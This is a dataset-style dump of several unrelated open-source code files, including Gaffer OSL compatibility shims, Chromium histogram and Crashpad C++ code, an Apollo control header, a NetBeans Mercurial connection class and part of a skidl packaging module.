max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
335 | <reponame>Safal08/Hacktoberfest-1
{
"word": "Both",
"definitions": [
"Used before the first of two alternatives to emphasize that the statement being made applies to each (the other alternative being introduced by \u2018and\u2019)"
],
"parts-of-speech": "Adverb"
} | 100 |
561 | ##########################################################################
#
# Copyright (c) 2018, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferOSL
class __DummyShaderPlug( object ):
	"""Stand-in for the old "shader" plug on OSLImage/OSLObject nodes.

	Old serialisations connected closures to a plug named "shader". This
	proxy forwards `setInput()` to a NameValuePlug named "legacyClosure"
	on the node's "channels"/"primitiveVariables" parent plug, creating
	that entry on demand.
	"""

	def __init__( self, node ):
		# The node whose legacy "shader" plug is being emulated.
		self.__node = node

	def setInput( self, plug ):
		"""Route the legacy connection to a dynamically created closure plug."""
		if isinstance( self.__node, GafferOSL.OSLImage ):
			parentPlug = self.__node["channels"]
		else:
			parentPlug = self.__node["primitiveVariables"]
		# Create the compatibility closure entry only once.
		if "legacyClosure" not in parentPlug:
			parentPlug.addChild(
				Gaffer.NameValuePlug( "", GafferOSL.ClosurePlug( "closure", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "legacyClosure" )
			)
		parentPlug["legacyClosure"]["value"].setInput( plug )
# Provides backwards compatibility by allowing access to the closure plug
# using its old name of "shader".
def __oslReplaceShaderGetItem( originalGetItem ) :

	def getItem( self, key ) :
		# Intercept only the legacy name; all other lookups pass through
		# to the wrapped __getitem__ untouched.
		return __DummyShaderPlug( self ) if key == "shader" else originalGetItem( self, key )

	return getItem

GafferOSL.OSLObject.__getitem__ = __oslReplaceShaderGetItem( GafferOSL.OSLObject.__getitem__ )
GafferOSL.OSLImage.__getitem__ = __oslReplaceShaderGetItem( GafferOSL.OSLImage.__getitem__ )
def __oslShaderGetItem( originalGetItem ) :

	def getItem( self, key ) :
		"""Compatibility shim for OSLShader "out" plug lookups.

		Scripts serialised prior to Gaffer 0.54 nested the output closure
		one level deeper, so when loading such a script we return the
		child plug instead of the "out" plug itself.
		"""
		if key != "out":
			return originalGetItem( self, key )
		if originalGetItem( self, "name" ).getValue() not in [ "ObjectProcessing/OutObject", "ImageProcessing/OutImage" ]:
			return originalGetItem( self, key )
		# Only remap while a script is actually being loaded.
		scriptNode = self.ancestor( Gaffer.ScriptNode )
		if not scriptNode or not scriptNode.isExecuting():
			return originalGetItem( self, key )
		# Walk up the node hierarchy looking for serialiser version metadata.
		parentNode = self.ancestor( Gaffer.Node )
		gafferVersion = None
		while parentNode :
			gafferVersion = (
				Gaffer.Metadata.value( parentNode, "serialiser:milestoneVersion" ),
				Gaffer.Metadata.value( parentNode, "serialiser:majorVersion" ),
				Gaffer.Metadata.value( parentNode, "serialiser:minorVersion" ),
				Gaffer.Metadata.value( parentNode, "serialiser:patchVersion" )
			)
			# Only use the information if every version component is present.
			# NOTE: the original used `if not filter( lambda x : x is None, ... )`,
			# which is only correct under Python 2; in Python 3 filter() returns
			# an always-truthy iterator, so the check could never succeed.
			if all( x is not None for x in gafferVersion ) :
				break
			gafferVersion = None
			parentNode = parentNode.ancestor( Gaffer.Node )
		if gafferVersion is not None and gafferVersion < ( 0, 54, 0, 0 ) :
			return originalGetItem( self, "out" )["out"]
		return originalGetItem( self, "out" )

	return getItem

GafferOSL.OSLShader.__getitem__ = __oslShaderGetItem( GafferOSL.OSLShader.__getitem__ )
| 1,382 |
14,668 | // Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef BASE_METRICS_HISTOGRAM_FUNCTIONS_H_
#define BASE_METRICS_HISTOGRAM_FUNCTIONS_H_
#include <string>
#include <type_traits>
#include "base/metrics/histogram.h"
#include "base/metrics/histogram_base.h"
#include "base/time/time.h"
// TODO(crbug/1265443): Update this file's function comments to provide more
// detail, like histogram_macros.h.
//
// Functions for recording metrics.
//
// For best practices on deciding when to emit to a histogram and what form
// the histogram should take, see
// https://chromium.googlesource.com/chromium/src.git/+/HEAD/tools/metrics/histograms/README.md
//
// For deciding whether to use the function or macro APIs, see
// https://chromium.googlesource.com/chromium/src/+/HEAD/tools/metrics/histograms/README.md#coding-emitting-to-histograms
//
// Every function is duplicated to take both std::string and char* for the name.
// This avoids ctor/dtor instantiation for constant strings to std::string,
// which makes the call be larger than caching macros (which do accept char*)
// in those cases.
namespace base {
// For numeric measurements where you want exact integer values up to
// |exclusive_max|. |exclusive_max| itself is included in the overflow bucket.
// Therefore, if you want an accurate measure up to kMax, then |exclusive_max|
// should be set to kMax + 1.
//
// |exclusive_max| should be 101 or less. If you need to capture a larger range,
// we recommend the use of the COUNT histograms below.
//
// Sample usage:
// base::UmaHistogramExactLinear("Histogram.Linear", sample, kMax + 1);
// In this case, buckets are 1, 2, .., kMax, kMax+1, where the kMax+1 bucket
// captures everything kMax+1 and above.
BASE_EXPORT void UmaHistogramExactLinear(const std::string& name,
int sample,
int exclusive_max);
BASE_EXPORT void UmaHistogramExactLinear(const char* name,
int sample,
int exclusive_max);
// For adding a sample to an enumerated histogram.
// Sample usage:
// // These values are persisted to logs. Entries should not be renumbered and
// // numeric values should never be reused.
// enum class NewTabPageAction {
// kUseOmnibox = 0,
// kClickTitle = 1,
// // kUseSearchbox = 2, // no longer used, combined into omnibox
// kOpenBookmark = 3,
// kMaxValue = kOpenBookmark,
// };
// base::UmaHistogramEnumeration("My.Enumeration",
// NewTabPageAction::kUseSearchbox);
// Records |sample| into the enumerated histogram |name|. T must be an enum
// class defining kMaxValue as its largest valid enumerator.
template <typename T>
void UmaHistogramEnumeration(const std::string& name, T sample) {
  static_assert(std::is_enum<T>::value, "T is not an enum.");
  // Referencing T::kMaxValue here also gives a semi-useful error for enums
  // that fail to define it ("no member named 'kMaxValue' in ...").
  constexpr uintmax_t kEnumMax = static_cast<uintmax_t>(T::kMaxValue);
  static_assert(kEnumMax <= static_cast<uintmax_t>(INT_MAX) - 1,
                "Enumeration's kMaxValue is out of range of INT_MAX!");
  DCHECK_LE(static_cast<uintmax_t>(sample), kEnumMax);
  // Buckets cover [0, kMaxValue]; kMaxValue + 1 is the exclusive maximum.
  UmaHistogramExactLinear(name, static_cast<int>(sample),
                          static_cast<int>(T::kMaxValue) + 1);
}
// char* overload of the enumerated-histogram recorder above; avoids a
// std::string construction at the call site.
template <typename T>
void UmaHistogramEnumeration(const char* name, T sample) {
  static_assert(std::is_enum<T>::value, "T is not an enum.");
  // Referencing T::kMaxValue here also gives a semi-useful error for enums
  // that fail to define it ("no member named 'kMaxValue' in ...").
  constexpr uintmax_t kEnumMax = static_cast<uintmax_t>(T::kMaxValue);
  static_assert(kEnumMax <= static_cast<uintmax_t>(INT_MAX) - 1,
                "Enumeration's kMaxValue is out of range of INT_MAX!");
  DCHECK_LE(static_cast<uintmax_t>(sample), kEnumMax);
  // Buckets cover [0, kMaxValue]; kMaxValue + 1 is the exclusive maximum.
  UmaHistogramExactLinear(name, static_cast<int>(sample),
                          static_cast<int>(T::kMaxValue) + 1);
}
// Some legacy histograms may manually specify the enum size, with a kCount,
// COUNT, kMaxValue, or MAX_VALUE sentinel like so:
// // These values are persisted to logs. Entries should not be renumbered and
// // numeric values should never be reused.
// enum class NewTabPageAction {
// kUseOmnibox = 0,
// kClickTitle = 1,
// // kUseSearchbox = 2, // no longer used, combined into omnibox
// kOpenBookmark = 3,
// kCount,
// };
// base::UmaHistogramEnumeration("My.Enumeration",
// NewTabPageAction::kUseSearchbox,
// kCount);
// Note: The value in |sample| must be strictly less than |enum_size|. This is
// otherwise functionally equivalent to the above.
// Overload for legacy enums that carry an explicit size sentinel.
// |sample| must be strictly less than |enum_size|.
template <typename T>
void UmaHistogramEnumeration(const std::string& name, T sample, T enum_size) {
  static_assert(std::is_enum<T>::value, "T is not an enum.");
  const uintmax_t exclusive_max = static_cast<uintmax_t>(enum_size);
  DCHECK_LE(exclusive_max, static_cast<uintmax_t>(INT_MAX));
  DCHECK_LT(static_cast<uintmax_t>(sample), exclusive_max);
  UmaHistogramExactLinear(name, static_cast<int>(sample),
                          static_cast<int>(enum_size));
}
// char* overload of the explicit-size enumerated-histogram recorder above.
template <typename T>
void UmaHistogramEnumeration(const char* name, T sample, T enum_size) {
  static_assert(std::is_enum<T>::value, "T is not an enum.");
  const uintmax_t exclusive_max = static_cast<uintmax_t>(enum_size);
  DCHECK_LE(exclusive_max, static_cast<uintmax_t>(INT_MAX));
  DCHECK_LT(static_cast<uintmax_t>(sample), exclusive_max);
  UmaHistogramExactLinear(name, static_cast<int>(sample),
                          static_cast<int>(enum_size));
}
// For adding boolean sample to histogram.
// Sample usage:
// base::UmaHistogramBoolean("My.Boolean", true)
BASE_EXPORT void UmaHistogramBoolean(const std::string& name, bool sample);
BASE_EXPORT void UmaHistogramBoolean(const char* name, bool sample);
// For adding histogram sample denoting a percentage.
// Percents are integers between 1 and 100, inclusively.
// Sample usage:
// base::UmaHistogramPercentage("My.Percent", 69)
BASE_EXPORT void UmaHistogramPercentage(const std::string& name, int percent);
BASE_EXPORT void UmaHistogramPercentage(const char* name, int percent);
// Obsolete. Use |UmaHistogramPercentage| instead. See crbug/1121318.
BASE_EXPORT void UmaHistogramPercentageObsoleteDoNotUse(const std::string& name,
int percent);
BASE_EXPORT void UmaHistogramPercentageObsoleteDoNotUse(const char* name,
int percent);
// For adding counts histogram.
// Sample usage:
// base::UmaHistogramCustomCounts("My.Counts", some_value, 1, 600, 30)
BASE_EXPORT void UmaHistogramCustomCounts(const std::string& name,
int sample,
int min,
int exclusive_max,
int buckets);
BASE_EXPORT void UmaHistogramCustomCounts(const char* name,
int sample,
int min,
int exclusive_max,
int buckets);
// Counts specialization for maximum counts 100, 1000, 10k, 100k, 1M and 10M.
BASE_EXPORT void UmaHistogramCounts100(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts100(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts1000(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts1000(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts10000(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts10000(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts100000(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts100000(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts1M(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts1M(const char* name, int sample);
BASE_EXPORT void UmaHistogramCounts10M(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramCounts10M(const char* name, int sample);
// For histograms storing times. It uses milliseconds granularity.
BASE_EXPORT void UmaHistogramCustomTimes(const std::string& name,
TimeDelta sample,
TimeDelta min,
TimeDelta max,
int buckets);
BASE_EXPORT void UmaHistogramCustomTimes(const char* name,
TimeDelta sample,
TimeDelta min,
TimeDelta max,
int buckets);
// For short timings from 1 ms up to 10 seconds (50 buckets).
BASE_EXPORT void UmaHistogramTimes(const std::string& name, TimeDelta sample);
BASE_EXPORT void UmaHistogramTimes(const char* name, TimeDelta sample);
// For medium timings up to 3 minutes (50 buckets).
BASE_EXPORT void UmaHistogramMediumTimes(const std::string& name,
TimeDelta sample);
BASE_EXPORT void UmaHistogramMediumTimes(const char* name, TimeDelta sample);
// For time intervals up to 1 hr (50 buckets).
BASE_EXPORT void UmaHistogramLongTimes(const std::string& name,
TimeDelta sample);
BASE_EXPORT void UmaHistogramLongTimes(const char* name, TimeDelta sample);
// For time intervals up to 1 hr (100 buckets).
BASE_EXPORT void UmaHistogramLongTimes100(const std::string& name,
TimeDelta sample);
BASE_EXPORT void UmaHistogramLongTimes100(const char* name, TimeDelta sample);
// For histograms storing times with microseconds granularity.
BASE_EXPORT void UmaHistogramCustomMicrosecondsTimes(const std::string& name,
TimeDelta sample,
TimeDelta min,
TimeDelta max,
int buckets);
BASE_EXPORT void UmaHistogramCustomMicrosecondsTimes(const char* name,
TimeDelta sample,
TimeDelta min,
TimeDelta max,
int buckets);
// For microseconds timings from 1 microsecond up to 10 seconds (50 buckets).
BASE_EXPORT void UmaHistogramMicrosecondsTimes(const std::string& name,
TimeDelta sample);
BASE_EXPORT void UmaHistogramMicrosecondsTimes(const char* name,
TimeDelta sample);
// For recording memory related histograms.
// Used to measure common KB-granularity memory stats. Range is up to 500M.
BASE_EXPORT void UmaHistogramMemoryKB(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramMemoryKB(const char* name, int sample);
// Used to measure common MB-granularity memory stats. Range is up to ~1G.
BASE_EXPORT void UmaHistogramMemoryMB(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramMemoryMB(const char* name, int sample);
// Used to measure common MB-granularity memory stats. Range is up to ~64G.
BASE_EXPORT void UmaHistogramMemoryLargeMB(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramMemoryLargeMB(const char* name, int sample);
// For recording sparse histograms.
// The |sample| can be a negative or non-negative number.
//
// Sparse histograms are well suited for recording counts of exact sample values
// that are sparsely distributed over a relatively large range, in cases where
// ultra-fast performance is not critical. For instance, Sqlite.Version.* are
// sparse because for any given database, there's going to be exactly one
// version logged.
//
// Performance:
// ------------
// Sparse histograms are typically more memory-efficient but less time-efficient
// than other histograms. Essentially, sparse histograms use a map rather
// than a vector for their backing storage; they also require lock acquisition
// to increment a sample, whereas other histograms do not. Hence, each increment
// operation is a bit slower than for other histograms. But, if the data is
// sparse, then they use less memory client-side, because they allocate buckets
// on demand rather than preallocating.
//
// Data size:
// ----------
// Note that server-side, we still need to load all buckets, across all users,
// at once. Thus, please avoid exploding such histograms, i.e. uploading many
// many distinct values to the server (across all users). Concretely, keep the
// number of distinct values <= 100 ideally, definitely <= 1000. If you have no
// guarantees on the range of your data, use clamping, e.g.:
// UmaHistogramSparse("My.Histogram", base::clamp(value, 0, 200));
BASE_EXPORT void UmaHistogramSparse(const std::string& name, int sample);
BASE_EXPORT void UmaHistogramSparse(const char* name, int sample);
} // namespace base
#endif // BASE_METRICS_HISTOGRAM_FUNCTIONS_H_
| 5,520 |
365 | //
// SegmentTabController.h
// YPTabBarController
//
// Created by 喻平 on 16/5/23.
// Copyright © 2016年 YPTabBarController. All rights reserved.
//
#import "YPTabBarController.h"
// Tab bar controller presented as a segmented control. No members are
// declared here; behaviour is inherited from YPTabBarController —
// NOTE(review): presumably configured in the base class or Interface
// Builder; confirm against the .m file.
@interface SegmentTabController : YPTabBarController
@end
| 89 |
22,688 | /******************************************************************************
* Copyright 2017 The Apollo Authors. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*****************************************************************************/
#pragma once
#include <memory>
#include <string>
#include "cyber/class_loader/class_loader.h"
#include "cyber/component/timer_component.h"
#include "cyber/time/time.h"
#include "modules/canbus/proto/chassis.pb.h"
#include "modules/common/monitor_log/monitor_log_buffer.h"
#include "modules/control/proto/control_cmd.pb.h"
#include "modules/control/proto/control_conf.pb.h"
#include "modules/control/proto/pad_msg.pb.h"
#include "modules/localization/proto/localization.pb.h"
#include "modules/planning/proto/planning.pb.h"
#include "modules/common/util/util.h"
#include "modules/control/common/dependency_injector.h"
#include "modules/control/controller/controller_agent.h"
#include "modules/control/proto/preprocessor.pb.h"
#include "modules/control/submodules/preprocessor_submodule.h"
/**
* @namespace apollo::control
* @brief apollo::control
*/
namespace apollo {
namespace control {
/**
* @class Control
*
* @brief control module main class, it processes localization, chassis, and
* pad data to compute throttle, brake and steer values.
*/
class ControlComponent final : public apollo::cyber::TimerComponent {
  friend class ControlTestBase;

 public:
  ControlComponent();
  // TimerComponent lifecycle: Init() once, then Proc() on each timer tick.
  bool Init() override;
  bool Proc() override;

 private:
  // Upon receiving pad message
  void OnPad(const std::shared_ptr<PadMessage> &pad);
  void OnChassis(const std::shared_ptr<apollo::canbus::Chassis> &chassis);
  void OnPlanning(
      const std::shared_ptr<apollo::planning::ADCTrajectory> &trajectory);
  void OnLocalization(
      const std::shared_ptr<apollo::localization::LocalizationEstimate>
          &localization);
  // Upon receiving monitor message
  void OnMonitor(
      const apollo::common::monitor::MonitorMessage &monitor_message);
  common::Status ProduceControlCommand(ControlCommand *control_command);
  common::Status CheckInput(LocalView *local_view);
  common::Status CheckTimestamp(const LocalView &local_view);
  common::Status CheckPad();

 private:
  apollo::cyber::Time init_time_;
  // Latest messages cached by the reader callbacks.
  // NOTE(review): presumably guarded by mutex_ below — confirm in the .cc.
  localization::LocalizationEstimate latest_localization_;
  canbus::Chassis latest_chassis_;
  planning::ADCTrajectory latest_trajectory_;
  PadMessage pad_msg_;
  common::Header latest_replan_trajectory_header_;
  ControllerAgent controller_agent_;
  // Emergency-stop state and the reason it was triggered.
  bool estop_ = false;
  std::string estop_reason_;
  bool pad_received_ = false;
  // Counters for dropped / sanity-check-failed input status, per-window and
  // cumulative.
  unsigned int status_lost_ = 0;
  unsigned int status_sanity_check_failed_ = 0;
  unsigned int total_status_lost_ = 0;
  unsigned int total_status_sanity_check_failed_ = 0;
  ControlConf control_conf_;
  // NOTE(review): std::mutex is used but <mutex> is not included directly;
  // this relies on a transitive include — consider adding <mutex>.
  std::mutex mutex_;
  std::shared_ptr<cyber::Reader<apollo::canbus::Chassis>> chassis_reader_;
  std::shared_ptr<cyber::Reader<PadMessage>> pad_msg_reader_;
  std::shared_ptr<cyber::Reader<apollo::localization::LocalizationEstimate>>
      localization_reader_;
  std::shared_ptr<cyber::Reader<apollo::planning::ADCTrajectory>>
      trajectory_reader_;
  std::shared_ptr<cyber::Writer<ControlCommand>> control_cmd_writer_;
  // when using control submodules
  std::shared_ptr<cyber::Writer<LocalView>> local_view_writer_;
  common::monitor::MonitorLogBuffer monitor_logger_buffer_;
  LocalView local_view_;
  std::shared_ptr<DependencyInjector> injector_;
};
CYBER_REGISTER_COMPONENT(ControlComponent)
} // namespace control
} // namespace apollo
| 1,254 |
331 | <filename>packages/api-explorer-style/package.json
{
"name": "@colmena/api-explorer-style",
"version": "0.1.0",
"description": "Colmena style for the Loopback API Explorer",
"publishConfig": {
"access": "public"
},
"license": "MIT",
"author": "<NAME> <<EMAIL>> (https://github.com/beeman) (https://twitter.com/beeman_nl)",
"url": "https://github.com/colmena/colmena"
}
| 149 |
997 | #ifndef CRYPTO_SIGN_H
#define CRYPTO_SIGN_H
#include "api.h"
#endif
| 35 |
14,668 | // Copyright 2020 The Crashpad Authors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "util/file/output_stream_file_writer.h"
#include "base/logging.h"
#include "base/notreached.h"
#include "util/stream/output_stream_interface.h"
namespace crashpad {
// Takes ownership of |output_stream|; all subsequent writes are forwarded
// to it.
OutputStreamFileWriter::OutputStreamFileWriter(
    std::unique_ptr<OutputStreamInterface> output_stream)
    : output_stream_(std::move(output_stream)),
      flush_needed_(false),
      flushed_(false) {}
OutputStreamFileWriter::~OutputStreamFileWriter() {
  // Any successful Write() must be followed by Flush() before destruction;
  // destroying with unflushed data is a usage error.
  DCHECK(!flush_needed_);
}
bool OutputStreamFileWriter::Write(const void* data, size_t size) {
  DCHECK(!flushed_);  // Writing after Flush() is not supported.
  // On success a Flush() becomes mandatory; on failure the stream is
  // considered dead and no flush is owed (flush_needed_ stays false).
  flush_needed_ =
      output_stream_->Write(static_cast<const uint8_t*>(data), size);
  return flush_needed_;
}
// Writes each buffer in |iovecs| to the underlying stream in order.
// Returns false — and cancels the pending-flush obligation — on an empty
// list or on the first failed write.
bool OutputStreamFileWriter::WriteIoVec(std::vector<WritableIoVec>* iovecs) {
  DCHECK(!flushed_);
  if (iovecs->empty()) {
    LOG(ERROR) << "no iovecs";
    flush_needed_ = false;
    return false;
  }
  flush_needed_ = true;
  for (const WritableIoVec& vec : *iovecs) {
    const uint8_t* bytes = static_cast<const uint8_t*>(vec.iov_base);
    if (!output_stream_->Write(bytes, vec.iov_len)) {
      flush_needed_ = false;
      return false;
    }
  }
  return true;
}
// Seeking is meaningless on a forward-only output stream, so this is never
// expected to be called.
FileOffset OutputStreamFileWriter::Seek(FileOffset offset, int whence) {
  NOTREACHED();
  return -1;
}
bool OutputStreamFileWriter::Flush() {
  // Terminal operation: after a flush no further writes are permitted
  // (enforced by the DCHECK in Write()).
  flush_needed_ = false;
  flushed_ = true;
  return output_stream_->Flush();
}
} // namespace crashpad
| 702 |
14,668 | <gh_stars>1000+
// Copyright (c) 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "scoped_refptr.h"
// Test fixtures for the scoped_refptr rewriting tool; the types are
// deliberately trivial.
struct Foo {
  int dummy;
};

struct Bar : public Foo {
  int another_dummy;
};

// |temp| is intentionally unused — the tool only inspects the Foo* type of
// the initialization.
void ExpectsRawPtr(Foo* foo) {
  Foo* temp = foo;
}
// Ensure that de-referencing scoped_refptr<>'s are properly rewritten as
// ->get() calls, and that the correct conversion is rewritten (eg: not the
// Bar* -> Foo* conversion).
Foo* GetHeapFoo() {
  // NOTE(review): the heap-allocated scoped_refptr is never deleted; as a
  // rewriting-tool fixture this leak appears intentional.
  scoped_refptr<Bar>* heap_allocated = new scoped_refptr<Bar>();
  *heap_allocated = new Bar;
  // The tool must rewrite this dereference into a ->get() call, applying the
  // Bar* -> Foo* conversion at the return.
  return heap_allocated->get();
}
| 231 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.mercurial.ui.repository;
import org.netbeans.modules.mercurial.config.Scrambler;
import java.net.URISyntaxException;
/**
*
* @author <NAME>
*/
/**
 * A Mercurial repository connection: URL plus optional credentials, an
 * optional external (e.g. tunnel) command, and a save-password flag.
 * Instances can be round-tripped through {@link #getString} / {@link #parse}.
 */
public class RepositoryConnection {

    /** Field separator used by getString()/parse(). */
    private static final String RC_DELIMITER = "~=~"; // NOI18N

    private HgURL url;
    private String externalCommand;
    private boolean savePassword;

    public RepositoryConnection(String url) throws URISyntaxException {
        this(new HgURL(url), null, false);
    }

    public RepositoryConnection(String url,
                                String username,
                                String password,
                                String externalCommand,
                                boolean savePassword) throws URISyntaxException {
        this(new HgURL(url, username, password == null ? null : password.toCharArray()), externalCommand, savePassword);
    }

    public RepositoryConnection(HgURL url, String externalCommand, boolean savePassword) {
        this.url = url;
        this.externalCommand = externalCommand;
        this.savePassword = savePassword;
    }

    public HgURL getUrl() {
        return url;
    }

    String getUsername() {
        return url.getUsername();
    }

    char[] getPassword() {
        return url.getPassword();
    }

    public String getExternalCommand() {
        return externalCommand;
    }

    public boolean isSavePassword() {
        return savePassword;
    }

    /**
     * Two connections are equal iff they are of the same class and their
     * URLs are equal. Only {@code url} participates, consistent with
     * {@link #hashCode}.
     */
    @Override
    public boolean equals(Object o) {
        if (o == null) {
            return false;
        }
        if (getClass() != o.getClass()) {
            return false;
        }
        final RepositoryConnection test = (RepositoryConnection) o;
        // Fixed null handling: the original tested `this.url != null` here,
        // which made a null URL compare equal to any non-null one.
        if (this.url != test.url
                && (this.url == null || !this.url.equals(test.url))) {
            return false;
        }
        return true;
    }

    @Override
    public int hashCode() {
        int hash = 3;
        hash = 61 * hash + (this.url != null ? this.url.hashCode() : 0);
        return hash;
    }

    @Override
    public String toString() {
        return url.toString();
    }

    /**
     * Serializes a connection into a delimiter-separated record:
     * url ~=~ username ~=~ password ~=~ externalCommand ~=~ (savePassword).
     * The password field is deliberately written empty — NOTE(review):
     * presumably passwords are persisted elsewhere; confirm against parse()
     * callers before changing this.
     */
    public static String getString(RepositoryConnection rc) {
        String url = rc.url.toUrlStringWithoutUserInfo();
        String username = rc.getUsername();
        String extCommand = rc.getExternalCommand();
        StringBuilder sb = new StringBuilder();
        sb.append(url);
        sb.append(RC_DELIMITER);
        if (username != null) {
            sb.append(username);
        }
        sb.append(RC_DELIMITER);
        sb.append(""); //NOI18N
        sb.append(RC_DELIMITER);
        if (extCommand != null) {
            sb.append(extCommand);
        }
        sb.append(RC_DELIMITER);
        sb.append(RC_DELIMITER);
        return sb.toString();
    }

    /**
     * Reconstructs a connection from a record produced by {@link #getString}.
     * Missing or empty fields become null; savePassword defaults to true.
     *
     * @throws URISyntaxException if the stored URL is malformed
     */
    public static RepositoryConnection parse(String str) throws URISyntaxException {
        String[] fields = str.split(RC_DELIMITER);
        int l = fields.length;
        String url = fields[0];
        String username = l > 1 && !fields[1].equals("") ? fields[1] : null; // NOI18N
        String password = l > 2 && !fields[2].equals("") ? Scrambler.getInstance().descramble(fields[2]) : null; // NOI18N
        String extCmd = l > 3 && !fields[3].equals("") ? fields[3] : null; // NOI18N
        boolean save = l > 4 && !fields[4].equals("") ? Boolean.parseBoolean(fields[4]) : true;
        return new RepositoryConnection(url,
                                        username,
                                        (username != null) ? password : null,
                                        extCmd,
                                        save);
    }
}
| 2,049 |
700 | # -*- coding: utf-8 -*-
# The MIT License (MIT) - Copyright (c) 2016-2021 <NAME>.
"""
Package a subcircuit so it can be used like a Part.
"""
from __future__ import ( # isort:skip
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import super, zip
from copy import copy
from future import standard_library
from .bus import Bus
from .circuit import subcircuit
from .interface import Interface
from .net import Net
from .part import NETLIST
from .protonet import ProtoNet
standard_library.install_aliases()
class Package(Interface):
    """A subcircuit wrapped so it can be instantiated like a Part.

    A Package is a dict-like Interface whose entries are the subcircuit's
    I/O (ProtoNets, Nets, Buses) plus bookkeeping entries such as
    ``circuit`` and ``subcircuit``.
    """

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self["circuit"] = None
        # Don't use update(). It doesn't seem to call __setitem__.
        for k, v in list(kwargs.items()):
            self[k] = v  # Use __setitem__ so both dict item and attribute are created.

    def __call__(self, *args, **kwargs):
        """Create a copy of a package."""
        # Get circuit that will contain the package subcircuitry.
        # NOTE(review): `default_circuit` appears to be a global injected by
        # the surrounding framework — confirm it is in scope at call time.
        circuit = kwargs.pop("circuit", default_circuit)
        # See if this package should be instantiated into the netlist or used as a template.
        dest = kwargs.pop("dest", NETLIST)
        pckg = Package(**self.copy())  # Create a shallow copy of the package.
        # Set the circuit that the ProtoNets belong to. Also, make copies of any
        # implicit buses or nets that were specified as default I/Os in the
        # package definition.
        for k, v in pckg.items():
            if isinstance(v, ProtoNet):
                v.circuit = circuit
            elif isinstance(v, (Net, Bus)):
                if v.is_implicit():
                    pckg[k] = v.__class__()
                    # pckg[k] = v.copy()
        # Don't use update(). It doesn't seem to call __setitem__.
        for k, v in list(kwargs.items()):
            pckg[k] = v  # Use __setitem__ so both dict item and attribute are created.
        pckg.subcircuit = self.subcircuit  # Assign subcircuit creation function.
        # Remove creation function so it's not passed as a parameter.
        del pckg["subcircuit"]
        # Add package to circuit only if it's supposed to be instantiated.
        if dest == NETLIST:
            circuit += pckg
        return pckg

    def is_movable(self):
        """Packages are always movable."""
        # The original body also contained a per-member is_movable() loop,
        # but it sat after this return and was unreachable dead code; it has
        # been removed without changing behavior.
        return True
def package(subcirc_func):
    """Decorator that creates a package for a subcircuit routine."""
    pckg = Package()  # Create the package.
